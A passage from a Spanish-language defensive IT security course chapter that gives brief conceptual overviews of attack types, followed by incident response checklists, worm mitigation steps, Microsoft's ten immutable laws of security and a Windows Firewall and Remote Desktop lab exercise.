Usar IPSec para encriptar el trafico de red.
Usar redes switcheadas para evitar la captura de paquetes.

1.48.12. Técnicas de Hacking: Island Hopping

Island Hopping es una técnica de Hacking en la cual el hacker incorpora una red
de ordenadores débiles y después se traslada a partes más seguras de la red.
Esencialmente, están utilizando las mismas técnicas discutidas previamente
para ampliar su influencia dentro de un ambiente dado de red. Una cosa es para
un atacante comprometer un web server sin interés y sin la seguridad apropiada.
Es algo mucho más atractivo la red corporativa entera donde existen datos más
interesantes para la compañía.

HASH CRAMMING
Permite al usuario conseguir el acceso al sistema sin romper la contraseña
insertando un Hash capturado directamente en la memoria. Esta técnica puede
apresurar un ataque porque el atacante no necesita primero comprometer el
password de una cuenta.

1.48.13. Técnicas de Hacking: Social Engineering

Es de naturaleza humana. Nosotros, como generalización, conseguir la
satisfacción de participar en el éxito de otros. Los atacantes ruegan a menudo
esta opción. No realizando prácticamente acción alguna, obtienen información
que de otra manera no estaría disponible. Un atacante social listo puede
trampear a menudo a individuos en la organización para divulgar la información
que pertenece a los nombres de servers, números de módem, direcciones IP,
configuraciones de red, políticas de password, nombres de cuentas u otra
información privilegiada que sea beneficiosa en un ataque.

1.48.14. Técnicas de Hacking: Denial of Service

Un atacante no tiene que acceder necesariamente a un sistema para causar

problemas significativos. Los ataques Denial of Service (DoS) realizan tareas en
los servicios con el fin de evitar su normal funcionamiento. Los ejemplos
incluirían todas las conexiones de red en un server o asegurarse que un mail
Server reciba más mails de los que puede manejar. Los ataques DoS pueden
ser un ataque directo o causado por virus, gusanos o Trojan horses.

Los objetivos de los ataques Denial of service pueden ser:

 CPU
 Espacio en disco
 Ancho de banda de red
 Cualquier recurso o servicio

1.49. Lista de comprobación de respuestas a incidentes

 Cap1-26.jpg

 Disponer de planes y procedimientos de respuesta a incidentes claros,

completos y bien comprobados es la clave para permitir una reacción
rápida y controlada ante las amenazas.
 Para limitar el efecto de un ataque, es importante que la respuesta sea
rápida y completa. Para que esto suceda, se debe realizar una
supervisión y auditoría de los sistemas.
 Una vez identificado un ataque, la respuesta al mismo dependerá del
tipo de ataque.
 Comunicar que el ataque se ha producido a todo el personal
pertinente.
 Contener los efectos del ataque en la medida de lo posible.
 Tomar medidas preventivas para asegurar que el ataque no pueda
repetirse.
 Crear documentación para especificar la naturaleza del ataque, cómo
se identificó y cómo se combatió.

1.50. Contención de los efectos de un ataque

 Cuando un sistema sufre un ataque, se debe apagar y quitar de la red,

y se debe proteger el resto de los sistemas de la red.
 Los servidores afectados se deben conservar y analizar, y es
necesario documentar las conclusiones.
 Puede ser muy difícil cumplir las normas legales para la conservación
de pruebas mientras se continúan las actividades cotidianas. Con la
 ayuda de asesores legales, se debe desarrollar un plan detallado que
permita conservar las pruebas del ataque y que cumpla los requisitos
legales de su jurisdicción, de modo que pueda ponerse en práctica un
plan cuando la red sufra un ataque.

1.51. Ejemplos de ataques

En este tema, se describirán varios escenarios de ataque. Específicamente, se

tratarán los escenarios siguientes:

 Un gusano ataca el puerto UDP 135

 Un gusano del correo electrónico
 Un ataque infecta un equipo antes de aplicar revisiones o correcciones

1.52. Ataque de un gusano al puerto UDP 135

 Perímetro
• El servidor de seguridad de red debe bloquearlo de acuerdo con su diseño

 Red
• Buscar y detectar los sistemas vulnerables
• Desactivar las conexiones de red en los hosts vulnerables
• Utilizar cuarentena de RRAS para asegurar que los hosts de acceso
telefónico tengan aplicadas las revisiones adecuadas

 Host
• Utilizar IPSec para permitir el uso del puerto UDP 135 entrante sólo en los
hosts que requieran RPC
• Utilizar Firewall de Windows para bloquear el tráfico entrante que no se
desea que llegue a los hosts (en Windows XP y versiones posteriores). En
este ejemplo, se ha producido la proliferación de una variedad del virus
Blaster. Se pueden tomar medidas en diversos niveles del modelo de
defensa en profundidad para impedir que un gusano ataque el puerto de
Protocolo de datagramas de usuario (UDP, User Datagram Protocol) 135.

1.53. Gusano de correo electrónico

 Perímetro
• Examinar todos los archivos adjuntos en la puerta de enlace SMTP
  Red
• Utilizar la cuarentena de RRAS para comprobar las revisiones aplicadas y las
firmas de virus

 Aplicación
• Microsoft Office 98
• Comprobar que esté instalada la actualización de seguridad de Microsoft
Outlook® 98.
• Office 2000.
• Comprobar que esté instalado al menos el Service Pack 2
• Office XP y Office 2003
• La configuración predeterminada de zona de seguridad es sitios restringidos
(en lugar de Internet) y las secuencias de comandos activas dentro de los
sitios restringidos, también están deshabilitadas de forma predeterminada

 Usuarios
• Enseñar a los usuarios que los archivos adjuntos pueden ser peligrosos.
• Si se recibe un archivo adjunto que no se ha pedido, escribir a su autor para
comprobar el propósito antes de abrirlo

 En los últimos años han aparecido muchos virus relacionados con el

correo electrónico. Se pueden tomar medidas en varios niveles del
modelo de defensa en profundidad para protegerse frente a los
gusanos de correo electrónico. Estas precauciones requieren
programas de aprendizaje específicos para que los usuarios conozcan
el riesgo y sigan los procedimientos apropiados.

1.54. “Han entrado en mi sistema antes de poder aplicar ninguna

revisión”

 Perímetro
• Habilitar o bloquear el servidor de seguridad

 Red
• Desconectar el cable de red

 Host
• Iniciar el sistema e inicie sesión
• Se pueden necesitar credenciales administrativas locales si las almacenadas
en caché están deshabilitadas
• Active Firewall de Windows para bloquear todo el tráfico entrante
• Volver a conectar el cable de red
• Descargar e instalar las revisiones apropiadas
• Reiniciar el sistema
• Desactivar Firewall de Windows según la directiva
 • Es posible que un ataque infecte un equipo antes de que se puedan
aplicar las revisiones o correcciones.
• Para impedir que se produzcan daños en otros equipos de la red mientras
se lo repara, seguir estos pasos:
1. Desconectar el cable de red.
2. Iniciar el sistema e iniciar sesión. Se pueden necesitar credenciales
administrativas locales si las almacenadas en caché están
deshabilitadas.
3. Activar Firewall de Windows para bloquear todo el tráfico entrante.
4. Volver a conectar el cable de red.
5. Descargar e instale la revisión.
6. Reiniciar el sistema.
7. Desactive Firewall de Windows de acuerdo con la directiva.

1.55. Recomendaciones

En este tema, se enumerarán las recomendaciones para mejorar la seguridad.

Específicamente, se tratará:

 Recomendaciones de seguridad.
 Lista de comprobación de la seguridad.

1.56. Recomendaciones de seguridad

 Defensa en profundidad
 Seguro por diseño
 Privilegios mínimos
 Aprender de los errores cometidos
 Mantener la seguridad
 Hacer que los usuarios se centren en la concienciación de seguridad
 Desarrollar y probar planes y procedimientos de respuesta a
incidentes

• Se deberá seguir el modelo de defensa en profundidad. Cada nivel del

modelo está protegido por los niveles contiguos y depende de todos los
niveles que se implementan.
• Hay un compromiso constante entre la funcionalidad y la seguridad.
Ambos raramente se complementan. Aunque quizás en alguna ocasión lo
importante haya sido la funcionalidad, ahora se busca definitivamente la
seguridad. Así se facilita una implementación segura por diseño. El
software y los sistemas son seguros de forma predeterminada y por
diseño, con lo que se simplifica la creación de un entorno de red seguro.
• Los procesos y las aplicaciones que se ejecutan en un sistema logran
este objetivo mediante un nivel definido de privilegios sobre el sistema. A
menos que se configuren de otro modo, los procesos iniciados, mientras
un usuario está conectado al sistema, se ejecutan con los mismos
privilegios que tiene el usuario. Para impedir ataques accidentales, todos
los usuarios del sistema deben iniciar sesión en él con los privilegios
mínimos necesarios para realizar sus funciones. Los virus se ejecutan con
los privilegios del usuario que haya iniciado la sesión. En consecuencia,
los virus tendrán un ámbito mucho más amplio si el usuario inicia sesión
como administrador.
• Las aplicaciones y los servicios también se deben ejecutar con los
privilegios mínimos necesarios.
• Es muy importante que se entienda que la seguridad no es un objetivo: es
un medio. Un entorno nunca es completamente seguro. Siguen
apareciendo nuevos virus, revisiones y puntos débiles en los sistemas.
Aprenda de la experiencia y conserve una documentación exhaustiva de
todo lo que suceda.
• Para mantener la seguridad, implementar procedimientos de supervisión y
auditoría, y comprobar que los resultados de estos procedimientos se
procesan con regularidad.
• Disponer de planes y procedimientos de respuesta a incidentes claros,
completos y bien comprobados, es la clave para permitir una reacción
rápida y controlada ante las amenazas.

1.57. Lista de comprobación de seguridad

• La seguridad comienza por el aprendizaje y la práctica. No se debe dejar

nada al azar ni permitir que los usuarios tomen sus propias decisiones
sobre este tema. Documentar todo lo que ocurra y crear procedimientos y
procesos para todas las funciones empresariales. Siempre que los
usuarios tengan que hacer algo, deben disponer de un documento que les
proporcione instrucciones paso a paso.
• Tomar la delantera manteniéndose informado de los problemas
relacionados con la seguridad. Microsoft enviará boletines de seguridad a
través del correo electrónico a los suscriptores. Muchos ataques se
efectúan aprovechando defectos de seguridad para los que existe alguna
revisión. Comprobar que se dispone de las herramientas de
administración de revisiones más actualizadas.
• No olvidar realizar una defensa en profundidad. Implementar
procedimientos de seguridad en todos los niveles del modelo, ya que
unos dependen de otros. La seguridad de una red viene definida por su
punto más débil.
• No dejar jamás de recalcar la importancia de efectuar copias de seguridad
con regularidad. La pérdida o la modificación de los datos puede resultar
catastrófica para un negocio. Deben llevarse a cabo copias de seguridad
habitualmente. Almacenar siempre las copias de seguridad en un lugar
 donde no estén los datos. Realizar también procedimientos de
restauración periódicamente.
• Averigüar cómo podrían atacar. Se deben conocer las herramientas de
ataque de un sistema y los virus. Investigar dónde se producen los
ataques y cómo. La encuesta sobre seguridad y delitos informáticos de
CSI/FBI puede ser un buen lugar para comenzar.

1.58. Diez normas de seguridad inmutables

En este tema final, se enumerarán las diez normas inmutables de seguridad.

Cap1-27.jpg

1. Cuando se elige ejecutar un programa, se está tomando la decisión de

conceder el control del equipo. Una vez que se ejecuta un programa, se
puede realizar cualquier acción, hasta un límite que viene determinado.
2. Al fin y al cabo, un sistema operativo sólo es un conjunto de unos y ceros
que, al ser interpretados por el procesador, provocan que el equipo
realice determinadas acciones. Al cambiar los unos y ceros, hará algo
 diferente. ¿Dónde se almacenan los unos y ceros? Pues en el equipo,
junto con todo lo demás. Son simplemente archivos y, si se permite
cambiarlos a los otros usuarios que utilizan el equipo, se "pierde la
partida".
3. Si alguien dispone de acceso físico a un equipo, tiene control total sobre
él y puede realizar cualquier acción que desee, como modificar datos o
robarlos, llevarse el hardware o destruir físicamente el equipo.
4. Si se administra un sitio Web, se tiene que limitar lo que pueden hacer en
él los visitantes. Sólo se debe permitir que se ejecute un programa en el
sitio si lo escribe uno mismo o si se confía en quien lo ha desarrollado.
Pero posiblemente esto no sea suficiente. Si el sitio Web es uno de los
que se alojan en un servidor compartido, se deben tomar precauciones
adicionales. Alguien con no muy buenas intenciones puede comprometer
uno de los demás sitios del servidor y es posible que pueda extender su
control al propio servidor y, por lo tanto, controlar todos los sitios que
contenga, incluido el de uno.
5. Si un intruso puede averiguar su contraseña, podrá iniciar sesión en el
equipo y realizar en él todas las acciones que puede hacer uno. Utilizar
siempre una contraseña; resulta increíble el número de cuentas que
tienen contraseñas en blanco. Y elegir una compleja. No utilizar el nombre
de un perro, fecha de aniversario ni el nombre de un equipo de fútbol
favorito. No emplear la palabra contraseña.
6. Un administrador poco confiable puede anular el resto de medidas de
seguridad que haya aplicado. Puede cambiar los permisos del equipo,
modificar las directivas de seguridad del sistema, instalar software
peligroso y suplantar a los usuarios, o realizar muchas otras acciones
diferentes. Puede sabotear prácticamente cualquier medida de protección
del sistema operativo, puesto que lo controla. Y lo que es peor, puede
borrar sus huellas. Si el administrador no es de confianza, el sistema no
tendrá ninguna seguridad en absoluto.
7. Muchos sistemas operativos y productos de software de criptografía dan
la opción de almacenar las claves criptográficas en el equipo. La ventaja
es la comodidad: no hay que ocuparse de la clave; pero esto es a costa
de la seguridad. Las claves se suelen disimular (es decir, se ocultan) y
algunos de los métodos para descubrirlas son bastante buenos. Pero, al
final, no importa lo bien oculta que esté la clave: si se halla en el equipo,
es posible encontrarla. Tiene que ser posible encontrarla; después de
todo, el software puede encontrarla, así que alguien suficientemente
motivado también podrá. Siempre que sea posible, se deben guardar las
claves en otro lugar.
8. Los detectores de virus comparan los datos de un equipo con un conjunto
de firmas de virus. Cada firma es característica de un virus en particular y,
cuando el detector encuentra en un archivo, en un mensaje de correo
electrónico o en algún otro lugar datos que coincidan con la firma,
determina que ha encontrado un virus. Sin embargo, un detector de virus
sólo puede encontrar los virus que conoce. Es vital mantener el archivo
 de firmas del detector de virus actualizado porque cada día se crean virus
nuevos.
9. La mejor forma de proteger la privacidad en Internet es igual que en la
vida normal: con forma de actuar. Leer las declaraciones de privacidad de
los sitios Web que se visitan y realizar transacciones sólo con aquellos
con cuyas prácticas se está de acuerdo. Si preocupan los cookies,
deshabilitarlos. Especialmente, no explorar la Web de forma
indiscriminada: sabemos que la mayor parte de las ciudades tienen una
zona que es mejor evitar, e Internet es igual.
10. Una seguridad perfecta requiere un grado de perfección que simplemente
no existe en realidad y que no es probable que exista nunca. Esto es
cierto tanto en el software como en casi todos los campos de interés
humano. El desarrollo de software es una ciencia imperfecta y casi todo el
software tiene errores. Algunos de ellos se pueden aprovechar para
infringir la seguridad. Esto es la realidad. Pero aunque el software pudiera
ser perfecto, con ello no se solucionaría todo el problema. La mayor parte
de los ataques implican, en cierto grado, alguna manipulación de la
naturaleza humana, en lo que se suele denominar estratagemas sociales.
Si se aumenta el costo y la dificultad de atacar la tecnología de seguridad,
quienes tengan malas intenciones responderán cambiando el modo de
actuar y pasarán a centrarse en la persona que se encuentra tras la
consola en lugar de en la tecnología. Es vital conocer la función de
mantenimiento de una seguridad sólida; en caso contrario sólo uno podría
convertirse en el punto débil del blindaje de los sistemas.

Para ver el artículo completo acerca de las diez normas inmutables de

seguridad, dirigirse a:
http://www.microsoft.com/technet/columns/security/essays/10imlaws.asp (este
sitio está en inglés)

Práctica 1: Habilitar Firewall de Windows y Configurar Firewall de Windows

para permitir el acceso al puerto 3389

Ejercicio 1: Crear una conexión a escritorio remoto

1. Inicie sesion en Windows XP ó Windows Server 2003

2. Desde start – Run escriba “mstsc.exe” y presione enter.
3. En el campo Computer escriba el nombre o dirección IP de la
computadora remota.
4. Luego presione el botón Connect.
5. El sistema remoto le pedirá credenciales.

Ejercicio 2: Cómo configurar Firewall de Windows para denegar la conexión.

Este ejercicio lo deberá realizar en la computadora remota.

1. Edite las propiedades de conexión del adaptador de red.

2. Seleccione el tab “Advanced”
3. Luego deje una marca en el cuadro “Internet Connection Firewall”
4. Edite la configuración del Firewall desde el boton “Settings”
5. Verifique que no hay servicios habilitados.
6. Presione dos veces en la opción OK
7. Verifique la conexión al escritorio remoto desde la otra computadora.

Ejercicio 3: Cómo configurar Firewall de Windows para permitir el uso del puerto
3389

Este ejercicio lo deberá realizar en la computadora remota.

1. Edite la configuración de Firewall presionando el botón “Settings”

2. Haga una marca en el cuadro Remote Desktop.
3. Presione dos veces en OK
4. Verifique la conexión al escritorio remoto desde otra computadora.
5. Verifique la conexión a otros servicios.

1.59. Resumen del capitulo

 Caso práctico
 Disciplina de administración de riesgos de seguridad
 Defensa en profundidad
 Respuesta a incidentes de seguridad
 Ejemplos de ataques
 Recomendaciones
 Diez normas de seguridad inmutables

Este capitulo ha sido una introducción a los fundamentos de la implementación

de un entorno de equipo seguro. Éste es un tema muy extenso y complejo que
requiere una atención continuada y una mejora constante de los conocimientos,
procesos y procedimientos.

1.60. Pasos siguientes

 Obtener aprendizaje de seguridad adicional

 Buscar seminarios de aprendizaje en línea:
  http://www.microsoft.com/seminar/events/security.mspx (este sitio está en
inglés)
 Buscar un CTEC local que ofrezca cursos prácticos:
http://www.microsoft.com/mspress/latam/default.htm
 Implementar una solución de administración de revisiones
 Buscar información de orientación y herramientas:
http://www.microsoft.com/technet/security/topics/patch/default.mspx (este
sitio está en inglés)
 Mantenerse informado sobre la seguridad:
 Suscribirse a boletines de seguridad:
http://www.microsoft.com/security/security_bulletins/alerts2.asp (este sitio
está en inglés)
 Obtener las directrices de seguridad de Microsoft más recientes:
http://www.microsoft.com/technet/security/bestprac/ (este sitio está en
inglés)

Los pasos siguientes incluyen ir al sitio Web de Microsoft para:

 Obtener aprendizaje de seguridad adicional.

 Buscar orientación sobre la implementación de una solución de
administración de revisiones.
 Obtener la información sobre seguridad más reciente.

1.61. Para obtener más información

Hay más información técnica para profesionales de IT y desarrolladores en los

sitios Web siguientes:

 Sitio de seguridad de Microsoft (todos los usuarios):

http://www.microsoft.com/latam/seguridad
 Sitio de seguridad de TechNet (profesionales de IT):
http://www.microsoft.com/latam/technet/seguridad/default.asp
 Sitio de seguridad de MSDN (desarrolladores).
http://msdn.microsoft.com/security (este sitio está en inglés)